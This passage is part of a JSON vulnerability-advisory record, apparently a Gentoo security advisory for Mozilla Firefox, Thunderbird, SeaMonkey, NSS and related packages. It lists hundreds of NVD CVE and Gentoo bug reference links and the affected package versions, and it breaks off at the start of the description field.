"http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2404", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3984", "https://bugs.gentoo.org/show_bug.cgi?id=413657", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1974", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2044", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3957", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0171", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1199", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3978", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3768", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2210", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2983", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0070", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0458", "http://www.mozilla.org/security/announce/2011/mfsa2011-34.html", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3079", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5052", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1954", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1957", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0080", "http://www.mozilla.org/security/announce/2011/mfsa2011-11.html", "https://bugs.gentoo.org/show_bug.cgi?id=238535", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0077", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2436", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4196", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2466", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2467", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1946", "https://bugs.gentoo.org/show_bug.cgi?id=312651", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0073", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3991", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0164", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0083", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3380", "https://bugs.gentoo.org/show_bug.cgi?id=365323", "https://bugs.gentoo.org/show_bug.cgi?id=379549", "https://bugs.gentoo.org/show_bug.cgi?id=390771", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2479", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2996", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4212", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0452", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0475", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1585", "https://bugs.gentoo.org/show_bug.cgi?id=427224", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3988", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4202", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4582", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1836", "https://bugs.gentoo.org/show_bug.cgi?id=403183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0776", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0220", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1839", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1308", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0168", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4508", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3975", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3967", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2370", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3174", "https://bugs.gentoo.org/show_bug.cgi?id=444318", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1209", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3980", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5833", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0182", "https://bugs.gentoo.org/show_bug.cgi?id=297532", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2465", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0771", "https://bugs.gentoo.org/show_bug.cgi?id=433383", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0455", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1313", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4063", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1044", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2770", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0085", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3837", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0352", "https://bugs.gentoo.org/show_bug.cgi?id=255221", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1947", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3985", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4210", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5016", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0462", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2470", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2752", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5508", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1201", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3640", "https://bugs.gentoo.org/show_bug.cgi?id=312675", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3379", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2993", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2478", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4190", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2464", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0444", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0181", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3078", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2462", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4215", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1828", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3990", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0450", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0461", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5839", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0477", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5505", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1949", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0057", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0066", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3647", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1028", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4070", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1213", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1966", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3070", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2365", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1210", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2995", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0463", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2469", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5507", "https://bugs.gentoo.org/show_bug.cgi?id=326341", "https://bugs.gentoo.org/show_bug.cgi?id=312763", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0159", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3003", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4195", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2989", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4216", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4207", "https://bugs.gentoo.org/show_bug.cgi?id=336396", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3993", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0445", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2437", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2753", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0054", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1563", "https://bugs.gentoo.org/show_bug.cgi?id=360315", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5074", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2982", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2463", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2372", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4194", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5504", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3131", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2760", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5913", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4064", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3232", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3775", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1958", "https://bugs.gentoo.org/show_bug.cgi?id=357057", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5012", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0358", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1304", "https://bugs.gentoo.org/show_bug.cgi?id=307045", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4186", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3766", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0179", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3659", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1214", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3389", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389", "https://bugs.gentoo.org/show_bug.cgi?id=408161", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2763", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5018", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5014", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3982", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0652", "https://bugs.gentoo.org/show_bug.cgi?id=439960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3372", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0058", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3961", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3971", "https://bugs.gentoo.org/show_bug.cgi?id=381245", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1310", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3956", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3771", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2766", "https://bugs.gentoo.org/show_bug.cgi?id=292034", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3986", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3866", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0068", "https://bugs.gentoo.org/show_bug.cgi?id=282549", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4062", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1967", "https://bugs.gentoo.org/show_bug.cgi?id=437780", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3062", "https://bugs.gentoo.org/show_bug.cgi?id=280226", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3652", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0082", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3177", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3653", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4185", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4058", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2664", "https://bugs.gentoo.org/show_bug.cgi?id=251322", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4206", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2362", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3388", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3170", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1212", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1832", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0176", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0175", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3074", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3670", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5843", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3179", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3171", "https://bugs.gentoo.org/show_bug.cgi?id=342847", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3381", "https://bugs.gentoo.org/show_bug.cgi?id=262704", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5501", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2999", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3376", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0441", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3377", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5013", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3969", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2768", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3776", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1939", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1303", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5019", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2990", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3075", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4059", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4068", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3989", "https://bugs.gentoo.org/show_bug.cgi?id=280234", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4182", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1963", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0056", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2755", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0053", "https://bugs.gentoo.org/show_bug.cgi?id=284439", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3973", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3176", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4061", "https://bugs.gentoo.org/show_bug.cgi?id=180159", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1971", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0356", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5017", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1951", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2061", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5822", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2363", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3399", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0069", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3001", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2373", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0446", "https://bugs.gentoo.org/show_bug.cgi?id=401701", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1203", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0777", "http://blog.mozilla.org/security/2011/03/22/firefox-blocking-fraudulent-certificates/", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3965", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5835", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3770", "https://bugs.gentoo.org/show_bug.cgi?id=273918", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0074", "https://bugs.gentoo.org/show_bug.cgi?id=280393", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2364", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0459", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2765", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3983", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3274", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1948", "https://bugs.gentoo.org/show_bug.cgi?id=312361", "https://bugs.gentoo.org/show_bug.cgi?id=329279", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2375", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0456", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0071", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3769", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3180", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1837", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1950", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0162", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2043", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3772", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3979", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1955", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0174", "https://bugs.gentoo.org/show_bug.cgi?id=286721", "https://bugs.gentoo.org/show_bug.cgi?id=341821", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0467", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3173", "https://bugs.gentoo.org/show_bug.cgi?id=419917", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1215", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0178", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5023", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5836", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0357", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3168", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3960", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1940", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3651", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2377", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2472", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2665", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4065", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2671", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0443", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1965", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1208", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3649", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3000", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0471", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3978", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0075", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3166", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3378", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4179", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3383", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1198", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4209", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5840", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1961", "https://bugs.gentoo.org/show_bug.cgi?id=181361", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1959", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3986", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0051", "https://bugs.gentoo.org/show_bug.cgi?id=312679", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3778", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2662", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3970", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3648", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3101", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1938", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0464", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5841", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5829", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0059", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1200", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3072", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3374", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2371", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2985", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0654", "https://bugs.gentoo.org/show_bug.cgi?id=255234", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4201", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5502", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3988", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2369", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2408", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1207", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4060", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1941", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1312", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0478", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1206", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1302", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3976", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3371", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0367", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3777", "https://bugs.gentoo.org/show_bug.cgi?id=277752", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3968", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0354", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0166", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1956", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2767", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3077", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4688", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0072", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4204", "https://bugs.gentoo.org/show_bug.cgi?id=246602", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2762", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3959", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3992", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0355", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4069", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3658", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0772", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3980", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2984", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1571", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2986", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1125", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0081", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-6961", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5830", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2605", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3774", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4192", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4193", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5503"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.14", "packageFilename": "UNKNOWN", "packageName": "www-client/seamonkey-bin", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "www-client/firefox", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "mail-client/thunderbird-bin", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.0", "packageFilename": "UNKNOWN", "packageName": "mail-client/mozilla-thunderbird-bin", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.5.6", "packageFilename": "UNKNOWN", "packageName": "www-client/mozilla-firefox-bin", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0-r1", "packageFilename": "UNKNOWN", "packageName": "www-client/icecat", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.6.8", "packageFilename": "UNKNOWN", "packageName": "www-client/mozilla-firefox", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.0.4-r1", "packageFilename": "UNKNOWN", "packageName": "mail-client/mozilla-thunderbird", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.8.1.19", "packageFilename": "UNKNOWN", "packageName": "net-libs/xulrunner-bin", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.14", "packageFilename": "UNKNOWN", "packageName": "dev-libs/nss", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.0-r1", "packageFilename": "UNKNOWN", "packageName": "net-libs/xulrunner", "arch": "all", "operator": "le"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.14-r1", "packageFilename": "UNKNOWN", "packageName": "www-client/seamonkey", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "mail-client/thunderbird", "arch": "all", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "10.0.11", "packageFilename": "UNKNOWN", "packageName": "www-client/firefox-bin", "arch": "all", "operator": "lt"}], "description": "### Background\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the 